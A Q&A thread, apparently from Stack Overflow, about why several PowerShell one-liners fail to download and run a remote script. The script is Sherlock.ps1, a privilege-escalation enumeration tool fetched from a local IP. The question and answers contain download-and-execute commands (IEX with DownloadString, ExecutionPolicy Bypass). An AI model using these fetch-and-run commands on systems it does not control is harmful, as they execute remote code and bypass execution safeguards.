# Run Powershell script from WebClient.DownloadString on the Command Prompt

Tags: powershell, downloadstring

On the Command Prompt, I want to run a PowerShell script that is stored at a URL.

Here is what I have tried:

```
powershell -c "iex ((New-Object System.Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1'))"

powershell -Command "& iex (New-Object System.Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1')"

powershell -NoProfile -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1'))"

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1')"
```

I have ran each of them for 5 minutes and nothing really showed the results I wanted. It displays no error but nothing really happen after waiting.

**I want to know why the above scripts does not work as intended?**

I will achieve the result I want by typing this instead:

```
echo IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1') | powershell -NoProfile -Command -
```

My question is similar to:
[Run Powershell script from URL without temporary file](https://stackoverflow.com/questions/43902878/run-powershell-script-from-url-without-temporary-file)

Other references:
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1

https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

Comment: You forgot to tell us _what happens_! Do you get errors? PowerShell exiting prematurely? Other unexpected behavior?

Comment: I have ran each of them for 5 minutes and nothing really showed the results I wanted. There was no display error but nothing really happen after waiting.

Comment: This is probably the syntax you should be using: `powershell -Exec ByPass -NoProfile -c "(New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1') | IEX"`. No need for `echo`.

Comment: I think **WebClient.DownloadString uses wrong encoding** in old version PSv2, If I download a file from psv5 `(New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1')` is successfully downloaded and running with your suggesion | IEX ... But when I try it on PSv2, downloadstring treated as showing wrong content with spaces bla bla etc... I added a picture for this [link](https://imageupload.io/77CrDQZyI5Zly4h)  I'm really wondering what's wrong here? Do u have any idea for this? @SantiagoSquarzon

Answer (score 1):

There is more than one method, but here's a quick one-liner that should do the trick from the command prompt:

```
powershell -ExecutionPolicy Bypass -Command "[scriptblock]::Create((Invoke-WebRequest "https://gist.githubusercontent.com/ChrisKibble/afea9880a184cd2b2445e5d8408715af/raw/41cbbf042af07136132f09395e4664ffab33e310/gistfile1.txt").Content).Invoke();"
```

This creates a script block based on the content of a file hosted at a URL.

As to why yours don't work, it's tough to say without debugging it or doing some process monitoring, but my first guess would be something wrong with your PS1 file (try something simple like just a `Write-Host`).